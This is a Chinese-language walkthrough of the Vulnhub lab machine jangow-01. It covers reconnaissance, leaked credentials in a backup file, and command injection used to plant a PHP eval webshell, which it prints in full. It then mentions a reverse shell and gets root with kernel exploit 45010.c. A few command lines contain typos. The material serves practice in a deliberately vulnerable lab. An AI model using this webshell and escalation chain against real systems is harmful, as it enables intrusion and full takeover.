靶机下载
https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova
靶场环境
NAT模式
kali:192.168.242.131
靶机:192.168.242.136
渗透测试
上来先信息收集(属于是肌肉记忆了)
nmap扫一波端口,只开放了21和80端口。
dirsearch爆破目录,发现.backup文件。
访问.backup,是个连接数据库的配置文件,直接拿到数据库账号密码(芜湖)。
用这个账号连ftp试试(连上了,但没什么有用的信息)
再回到80端口,点击Buscar
在buscar传参处改为pwd,可以命令执行
利用echo写入一句话木马
echo '<?php eval($_POST["cmd"]);?>'>eval.php
ls查看,成功写入
蚁剑连接
写入shell.php反弹nc,这里只能反弹443端口
访问shell.php触发反弹
切换完整的交互式bash
python3 -c import pty;pty.spawn("/bin/bash")
提权
蚁剑打开终端,查看系统信息进行提权,内核版本是ubuntu16.04
searchsploit搜索ubuntu16.04,利用45010.c可提权
把45010.c的代码复制出来,使用蚁剑上传eval.c
gcc编译eva.c
ggc eval.c -o eval
给编译好的eval执行权限
chmod +x eval
执行eval提权,得到root权限
拿flag咯
原文始发于微信公众号(白帽子左一):Vulnhub靶机练习笔记-jangow-01-1.0.1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论